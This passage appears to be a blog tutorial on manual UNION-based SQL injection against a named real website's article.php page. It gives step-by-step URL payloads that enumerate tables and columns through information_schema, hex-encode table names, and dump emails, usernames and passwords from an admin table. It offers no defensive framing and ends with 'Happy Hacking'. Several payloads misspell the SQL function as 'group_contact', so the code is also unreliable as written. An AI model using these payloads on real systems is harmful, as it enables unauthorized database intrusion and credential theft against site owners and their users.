Okay, So now we know the database version, now we need to get the tables names.
To do so, add this at the end of the url :
+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables
NOTE : It should be different in your case, in my case it's 1,2,3,4,table_name,... etc.
The url should look like this now :
http://www.novebrno.net/article.php?
id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables
Now you should get the Tables information. Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.
If it's that case add this at the end of the url :
+UNION+SELECT+1,2,3,4,group_contact(table_name),6,7,8,9,10,11 from information_schema.tables+where +table_schema=database()
Now this should work and you should get all the tables information :)
Some Tables should be :
About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts , etc.
Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name
So we add this at the end of the url :
+UNION+SELECT+1,2,3,4,group_contact
(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*table name*
So it should look like this :
http://www.novebrno.net/article.php?
id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from
information_schema.columns+where
+table_name=*table name*
Note : Whether you can add the Hexed table name if u want to.
So now lets say we got a 'admin' table, now we will change the url to:
http://www.novebrno.net/article.php?
id=-616+UNION+SELECT+1,group_contact
(column_name),3%20from%20information_schema.columns+where+table_name=admin
(You can change the table_name=..) to any table you want to get information from.
Now you will be like wtf? It didn't work, well that is because we didn't hax the table name.
So now to hax the table name go to :
Convert String
To Hexadecimal Online to convert the name admin into hax datas.
Now change the url to :
http://www.novebrno.net/article.php?
id=-616+UNION+SELECT+1,group_contact
(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e
Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.
Now that will give us all the columns of the table admin.
Now lets say we got the columns email,password and username, to get the information of them.
Type in the following in the url bar :
+UNION+SELECT+1,group_contact
(email,0x3a,username,0x3a,password),3 from admin
So it should look like :
http://www.novebrno.net/article.php?
id=-616+UNION+SELECT+1,group_contact
(email,0x3a,username,0x3a,password),3 from admin
So now you finally have the passwords, emails and user names :)
Remember, if your tables are different you also have to change the data with that I provided you.
Always think while hacking, don't just be
script kidde ;D
Happy Hacking/Penetration testing ;)
No comments:
Post a Comment